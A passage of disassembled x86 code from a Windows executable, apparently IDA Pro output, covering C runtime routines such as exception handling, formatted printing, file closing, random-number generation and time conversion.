mov [eax+4], ecx
retn 8
sub_403026 endp
; =============== S U B R O U T I N E =======================================
sub_40303E proc near ; CODE XREF: sub_4013E6+15p
; sub_4015ED+51p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D37C
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_40308B
test eax, eax
jz short loc_403085
push eax
call sub_4044E0
mov edi, eax
inc edi
push edi
call sub_403AAC
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_40308E
push dword ptr [ebx+4]
push edi
push eax
call sub_407A85
add esp, 0Ch
jmp short loc_40308E
; ---------------------------------------------------------------------------
loc_403085: ; CODE XREF: sub_40303E+1Ej
and dword ptr [esi+4], 0
jmp short loc_40308E
; ---------------------------------------------------------------------------
loc_40308B: ; CODE XREF: sub_40303E+1Aj
mov [esi+4], eax
loc_40308E: ; CODE XREF: sub_40303E+36j
; sub_40303E+45j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_40303E endp
; =============== S U B R O U T I N E =======================================
sub_403096 proc near ; CODE XREF: sub_401038+6j
; .text:0040104Cp ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D37C
jz short locret_4030AB
push dword ptr [ecx+4]
call sub_4039CF
pop ecx
locret_4030AB: ; CODE XREF: sub_403096+Aj
retn
sub_403096 endp
; =============== S U B R O U T I N E =======================================
sub_4030AC proc near ; DATA XREF: fabskl8p:0041D328o
; fabskl8p:0041D380o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_4030B8
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_4030B8: ; CODE XREF: sub_4030AC+5j
retn
sub_4030AC endp
; ---------------------------------------------------------------------------
loc_4030B9: ; DATA XREF: fabskl8p:off_41D37Co
push esi
mov esi, ecx
call sub_403096
test byte ptr [esp+8], 1
jz short loc_4030CF
push esi
call sub_403339
pop ecx
loc_4030CF: ; CODE XREF: .text:004030C6j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4030D5 proc near ; CODE XREF: sub_4031B1+18p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push dword_436950
call sub_405543
push dword_43694C
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_405543
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb short loc_40317A
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_40317A
push esi
call sub_402E11
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_403161
mov eax, 800h
cmp esi, eax
jnb short loc_403122
mov eax, esi
loc_403122: ; CODE XREF: sub_4030D5+49j
add eax, esi
cmp eax, esi
jb short loc_403138
push eax
push [esp+18h+var_4]
call sub_407B72
test eax, eax
pop ecx
pop ecx
jnz short loc_40314F
loc_403138: ; CODE XREF: sub_4030D5+51j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_40317A
push eax
push [esp+18h+var_4]
call sub_407B72
test eax, eax
pop ecx
pop ecx
jz short loc_40317A
loc_40314F: ; CODE XREF: sub_4030D5+61j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_4054D7
pop ecx
mov dword_436950, eax
loc_403161: ; CODE XREF: sub_4030D5+40j
mov esi, [esp+14h+arg_0]
mov [edi], esi
add edi, 4
push edi
call sub_4054D7
mov dword_43694C, eax
pop ecx
mov eax, esi
jmp short loc_40317C
; ---------------------------------------------------------------------------
loc_40317A: ; CODE XREF: sub_4030D5+27j
; sub_4030D5+33j ...
xor eax, eax
loc_40317C: ; CODE XREF: sub_4030D5+A3j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4030D5 endp
; =============== S U B R O U T I N E =======================================
sub_403182 proc near ; DATA XREF: fabskl8p:0041D2D4o
push esi
push 4
push 20h
call sub_407B2A
mov esi, eax
push esi
call sub_4054D7
add esp, 0Ch
test esi, esi
mov dword_436950, eax
mov dword_43694C, eax
jnz short loc_4031AA
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4031AA: ; CODE XREF: sub_403182+21j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_403182 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4031B1 proc near ; CODE XREF: sub_4031ED+4p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421668
call __SEH_prolog4
call sub_407C6C
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_4030D5
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4031E7
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_4031B1 endp
; =============== S U B R O U T I N E =======================================
sub_4031E7 proc near ; CODE XREF: sub_4031B1+28p
; DATA XREF: fabskl8p:00421680o
call sub_407C75
retn
sub_4031E7 endp
; =============== S U B R O U T I N E =======================================
sub_4031ED proc near ; CODE XREF: sub_403417+45p
; sub_407D29+44p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4031B1
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_4031ED endp
; =============== S U B R O U T I N E =======================================
sub_4031FF proc near ; CODE XREF: sub_407EC9+15p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4275E0, eax
retn
sub_4031FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_403209 proc near ; CODE XREF: sub_403305+1Fj
; sub_405DD8+21p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407F20
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:off_41D08C
push 0
mov esi, eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:off_41D198
test eax, eax
jnz short loc_4032DD
test esi, esi
jnz short loc_4032DD
push 2
call sub_407F15
pop ecx
loc_4032DD: ; CODE XREF: sub_403209+C6j
; sub_403209+CAj
push 0C000000Dh
call ds:dword_41D0C8 ; GetCurrentProcess
push eax
call ds:off_41D0F4
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_402ADC
add ebp, 2A8h
leave
retn
sub_403209 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403305 proc near ; CODE XREF: sub_402BA2+29p
; sub_402BA2+5Fp ...
push ebp
mov ebp, esp
push dword_4275E0
call sub_405543
test eax, eax
pop ecx
jz short loc_40331B
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_40331B: ; CODE XREF: sub_403305+11j
push 2
call sub_407F15
pop ecx
pop ebp
jmp sub_403209
sub_403305 endp
; =============== S U B R O U T I N E =======================================
sub_403329 proc near ; CODE XREF: sub_40164F+5p
; sub_40164F+14p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_403305
add esp, 14h
retn
sub_403329 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403339 proc near ; CODE XREF: .text:00401059p
; .text:004010D5p ...
jmp sub_4039CF
sub_403339 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40333E proc near ; CODE XREF: sub_401000+Fp
; sub_403EE2+84p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_403350
loc_40334C: ; CODE XREF: sub_40333E+4Bj
xor eax, eax
jmp short loc_4033B5
; ---------------------------------------------------------------------------
loc_403350: ; CODE XREF: sub_40333E+Cj
cmp [ebp+arg_0], edi
jnz short loc_403370
loc_403355: ; CODE XREF: sub_40333E+5Fj
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_40335F: ; CODE XREF: sub_40333E+72j
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_4033B5
; ---------------------------------------------------------------------------
loc_403370: ; CODE XREF: sub_40333E+15j
cmp [ebp+arg_8], edi
jz short loc_40338B
cmp [ebp+arg_4], esi
jb short loc_40338B
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407FA0
add esp, 0Ch
jmp short loc_40334C
; ---------------------------------------------------------------------------
loc_40338B: ; CODE XREF: sub_40333E+35j
; sub_40333E+3Aj
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_407F20
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_403355
cmp [ebp+arg_4], esi
jnb short loc_4033B2
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40335F
; ---------------------------------------------------------------------------
loc_4033B2: ; CODE XREF: sub_40333E+64j
push 16h
pop eax
loc_4033B5: ; CODE XREF: sub_40333E+10j
; sub_40333E+30j
pop edi
pop esi
pop ebp
retn
sub_40333E endp
; =============== S U B R O U T I N E =======================================
sub_4033B9 proc near ; CODE XREF: .text:004033CAp
push ecx
mov dword ptr [ecx], offset off_41D39C
call sub_408305
pop ecx
retn
sub_4033B9 endp
; ---------------------------------------------------------------------------
loc_4033C7: ; DATA XREF: fabskl8p:off_41D39Co
push esi
mov esi, ecx
call sub_4033B9
test byte ptr [esp+8], 1
jz short loc_4033DD
push esi
call sub_403339
pop ecx
loc_4033DD: ; CODE XREF: .text:004033D4j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4033E3 proc near ; CODE XREF: sub_40BDB6+12Dp
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_408380
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_4033E3 endp
; =============== S U B R O U T I N E =======================================
sub_4033FE proc near ; CODE XREF: sub_403417+3Bp
push esi
push 1
push offset off_423048
mov esi, ecx
call sub_403026
mov dword ptr [esi], offset off_41D324
mov eax, esi
pop esi
retn
sub_4033FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403417 proc near ; CODE XREF: sub_401291+5p
; sub_401395+5p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_40342C
; ---------------------------------------------------------------------------
loc_40341F: ; CODE XREF: sub_403417+20j
push [ebp+arg_0]
call sub_408412
test eax, eax
pop ecx
jz short loc_40343B
loc_40342C: ; CODE XREF: sub_403417+6j
push [ebp+arg_0]
call sub_403AAC
test eax, eax
pop ecx
jz short loc_40341F
leave
retn
; ---------------------------------------------------------------------------
loc_40343B: ; CODE XREF: sub_403417+13j
test byte ptr dword_4275F0, 1
mov esi, offset dword_4275E4
jnz short loc_403462
or dword_4275F0, 1
mov ecx, esi
call sub_4033FE
push offset loc_41CD71
call sub_4031ED
pop ecx
loc_403462: ; CODE XREF: sub_403417+30j
push esi
lea ecx, [ebp+var_C]
call sub_40303E
push offset dword_421D00
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D324
call sub_40456B
int 3 ; Trap to Debugger
sub_403417 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403481 proc near ; CODE XREF: sub_4198F3+84p
; sub_4198F3+102p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4034AC
loc_40348F: ; CODE XREF: sub_403481+30j
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4034F9
; ---------------------------------------------------------------------------
loc_4034AC: ; CODE XREF: sub_403481+Cj
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40348F
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_406D87
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_4034EA
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_4034F6
; ---------------------------------------------------------------------------
loc_4034EA: ; CODE XREF: sub_403481+60j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_406B86
pop ecx
pop ecx
loc_4034F6: ; CODE XREF: sub_403481+67j
mov eax, esi
pop esi
loc_4034F9: ; CODE XREF: sub_403481+29j
pop ebx
leave
retn
sub_403481 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034FC proc near ; CODE XREF: sub_4035C0+Ap
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset dword_421688
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov edi, [ebp+arg_0]
cmp edi, ebx
setnz al
cmp eax, ebx
jnz short loc_403537
loc_40351B: ; CODE XREF: sub_4034FC+47j
; sub_4034FC+52j
call sub_405B83
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
loc_403533: ; CODE XREF: sub_4034FC+6Bj
; sub_4034FC+92j
xor eax, eax
jmp short loc_4035B0
; ---------------------------------------------------------------------------
loc_403537: ; CODE XREF: sub_4034FC+1Dj
xor eax, eax
mov esi, [ebp+arg_4]
cmp esi, ebx
setnz al
cmp eax, ebx
jz short loc_40351B
xor eax, eax
cmp [esi], bl
setnz al
cmp eax, ebx
jz short loc_40351B
call sub_408851
mov [ebp+arg_0], eax
cmp eax, ebx
jnz short loc_403569
call sub_405B83
mov dword ptr [eax], 18h
jmp short loc_403533
; ---------------------------------------------------------------------------
loc_403569: ; CODE XREF: sub_4034FC+5Ej
mov [ebp+ms_exc.disabled], ebx
cmp [edi], bl
jnz short loc_403590
call sub_405B83
mov dword ptr [eax], 16h
push 0FFFFFFFEh
lea eax, [ebp+ms_exc.prev_er]
push eax
push offset dword_423064
call sub_408978
add esp, 0Ch
jmp short loc_403533
; ---------------------------------------------------------------------------
loc_403590: ; CODE XREF: sub_4034FC+72j
push eax
push [ebp+arg_8]
push esi
push edi
call sub_4085AF
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4035B6
mov eax, [ebp+var_1C]
loc_4035B0: ; CODE XREF: sub_4034FC+39j
call __SEH_epilog4
retn
sub_4034FC endp
; =============== S U B R O U T I N E =======================================
sub_4035B6 proc near ; CODE XREF: sub_4034FC+ACp
; DATA XREF: fabskl8p:004216A0o
push dword ptr [ebp+8]
call sub_40855D
pop ecx
retn
sub_4035B6 endp
; =============== S U B R O U T I N E =======================================
sub_4035C0 proc near ; CODE XREF: sub_4198F3+116p
; sub_41B9D6+4Ep
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4034FC
add esp, 0Ch
retn
sub_4035C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035D3 proc near ; CODE XREF: sub_4198F3+131p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 0Ch
push offset dword_4216A8
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov esi, [ebp+arg_0]
cmp esi, ebx
setnz al
cmp eax, ebx
jnz short loc_403612
loc_4035F2: ; CODE XREF: sub_4035D3+49j
call sub_405B83
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403712
; ---------------------------------------------------------------------------
loc_403612: ; CODE XREF: sub_4035D3+1Dj
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
cmp eax, ebx
jz short loc_4035F2
mov [ebp+arg_0], esi
push esi
call sub_40850B
pop ecx
mov [ebp+ms_exc.disabled], ebx
test byte ptr [esi+0Ch], 40h
jnz loc_4036DB
push esi
call sub_408DD0
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40366F
push esi
call sub_408DD0
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_40366F
push esi
call sub_408DD0
sar eax, 5
lea edi, ds:435820h[eax*4]
push esi
call sub_408DD0
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_403674
; ---------------------------------------------------------------------------
loc_40366F: ; CODE XREF: sub_4035D3+6Cj
; sub_4035D3+78j
mov eax, offset dword_423BD0
loc_403674: ; CODE XREF: sub_4035D3+9Aj
test byte ptr [eax+24h], 7Fh
jnz short loc_4036BF
push esi
call sub_408DD0
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4036B4
push esi
call sub_408DD0
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4036B4
push esi
call sub_408DD0
sar eax, 5
lea edi, ds:435820h[eax*4]
push esi
call sub_408DD0
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4036B9
; ---------------------------------------------------------------------------
loc_4036B4: ; CODE XREF: sub_4035D3+B1j
; sub_4035D3+BDj
mov eax, offset dword_423BD0
loc_4036B9: ; CODE XREF: sub_4035D3+DFj
test byte ptr [eax+24h], 80h
jz short loc_4036DB
loc_4036BF: ; CODE XREF: sub_4035D3+A5j
call sub_405B83
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
or [ebp+var_1C], 0FFFFFFFFh
loc_4036DB: ; CODE XREF: sub_4035D3+5Cj
; sub_4035D3+EAj
cmp [ebp+var_1C], ebx
jnz short loc_403703
push esi
call sub_408ACB
mov edi, eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
push esi
call sub_406D87
mov [ebp+var_1C], eax
push esi
push edi
call sub_408B61
add esp, 1Ch
loc_403703: ; CODE XREF: sub_4035D3+10Bj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403718
mov eax, [ebp+var_1C]
loc_403712: ; CODE XREF: sub_4035D3+3Aj
call __SEH_epilog4
retn
sub_4035D3 endp
; =============== S U B R O U T I N E =======================================
sub_403718 proc near ; CODE XREF: sub_4035D3+137p
; DATA XREF: fabskl8p:004216C0o
push dword ptr [ebp+8]
call sub_40855D
pop ecx
retn
sub_403718 endp
; =============== S U B R O U T I N E =======================================
sub_403722 proc near ; CODE XREF: sub_417C7B+4Fp
; sub_41AFF3+20Fp
arg_0 = dword ptr 4
call sub_40574D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_403722 endp
; =============== S U B R O U T I N E =======================================
sub_40372F proc near ; CODE XREF: sub_417C7B:loc_417DF7p
; sub_4198F3+A7p ...
call sub_40574D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_40372F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403751 proc near ; CODE XREF: sub_403802+12p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40377F
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_4037FF
; ---------------------------------------------------------------------------
loc_40377F: ; CODE XREF: sub_403751+Cj
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_4037AB
cmp esi, ebx
jnz short loc_4037AB
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4037FE
; ---------------------------------------------------------------------------
loc_4037AB: ; CODE XREF: sub_403751+37j
; sub_403751+3Bj
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_4037BA
mov [ebp+var_1C], ecx
loc_4037BA: ; CODE XREF: sub_403751+64j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_406D87
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_4037FD
dec [ebp+var_1C]
js short loc_4037EF
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_4037FB
; ---------------------------------------------------------------------------
loc_4037EF: ; CODE XREF: sub_403751+95j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_406B86
pop ecx
pop ecx
loc_4037FB: ; CODE XREF: sub_403751+9Cj
mov eax, edi
loc_4037FD: ; CODE XREF: sub_403751+90j
pop edi
loc_4037FE: ; CODE XREF: sub_403751+58j
pop esi
loc_4037FF: ; CODE XREF: sub_403751+29j
pop ebx
leave
retn
sub_403751 endp
; =============== S U B R O U T I N E =======================================
sub_403802 proc near ; CODE XREF: sub_417ABC+3Ep
; sub_417B51+7Cp ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_403751
add esp, 14h
retn
sub_403802 endp
; =============== S U B R O U T I N E =======================================
sub_40381D proc near ; CODE XREF: sub_403890+5Ap
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40384A
call sub_405B83
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40388C
; ---------------------------------------------------------------------------
loc_40384A: ; CODE XREF: sub_40381D+Ej
test byte ptr [esi+0Ch], 83h
jz short loc_403887
push esi
call sub_408F8A
push esi
mov ebx, eax
call sub_408F5E
push esi
call sub_408DD0
push eax
call sub_408E91
add esp, 10h
test eax, eax
jge short loc_403876
or ebx, 0FFFFFFFFh
jmp short loc_403887
; ---------------------------------------------------------------------------
loc_403876: ; CODE XREF: sub_40381D+52j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_403887
push eax
call sub_4039CF
pop ecx
mov [esi+1Ch], edi
loc_403887: ; CODE XREF: sub_40381D+31j
; sub_40381D+57j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_40388C: ; CODE XREF: sub_40381D+2Bj
pop edi
pop esi
pop ebx
retn
sub_40381D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403890 proc near ; CODE XREF: sub_40E383+43p
; sub_4198F3+137p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4216C8
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_4038CD
call sub_405B83
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4038D9
; ---------------------------------------------------------------------------
loc_4038CD: ; CODE XREF: sub_403890+1Ej
test byte ptr [esi+0Ch], 40h
jz short loc_4038DF
mov [esi+0Ch], edi
loc_4038D6: ; CODE XREF: sub_403890+6Fj
mov eax, [ebp+var_1C]
loc_4038D9: ; CODE XREF: sub_403890+3Bj
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4038DF: ; CODE XREF: sub_403890+41j
push esi
call sub_40850B
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_40381D
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403904
jmp short loc_4038D6
sub_403890 endp
; =============== S U B R O U T I N E =======================================
sub_403901 proc near ; DATA XREF: fabskl8p:004216E0o
mov esi, [ebp+8]
sub_403901 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403904 proc near ; CODE XREF: sub_403890+6Ap
push esi
call sub_40855D
pop ecx
retn
sub_403904 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40390C proc near ; CODE XREF: .text:00419AF6p
; sub_419B31+13p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:off_41D1A0
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_409120
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_403946
mov [ecx], eax
mov [ecx+4], edx
locret_403946: ; CODE XREF: sub_40390C+33j
leave
retn
sub_40390C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403948 proc near ; CODE XREF: sub_4039B0+15p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push esi
call sub_4044E0
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_403979
loc_40395C: ; CODE XREF: sub_403948+34j
call sub_405B83
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4039AD
; ---------------------------------------------------------------------------
loc_403979: ; CODE XREF: sub_403948+12j
cmp [ebp+arg_4], edi
jz short loc_40395C
mov ecx, 7FFFFFFFh
cmp eax, ecx
mov [ebp+var_14], 49h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
ja short loc_40399A
mov [ebp+var_1C], eax
loc_40399A: ; CODE XREF: sub_403948+4Dj
push [ebp+arg_C]
lea eax, [ebp+var_20]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call [ebp+arg_0]
add esp, 10h
loc_4039AD: ; CODE XREF: sub_403948+2Fj
pop edi
leave
retn
sub_403948 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4039B0 proc near ; CODE XREF: sub_4022DF+22Ep
; sub_4022DF+36Ep ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
lea eax, [esp+4+arg_8]
push eax
push 0
push [esp+0Ch+arg_4]
push offset sub_409217
call sub_403948
add esp, 10h
pop esi
retn
sub_4039B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039CF proc near ; CODE XREF: sub_403096+Fp sub_403339j ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
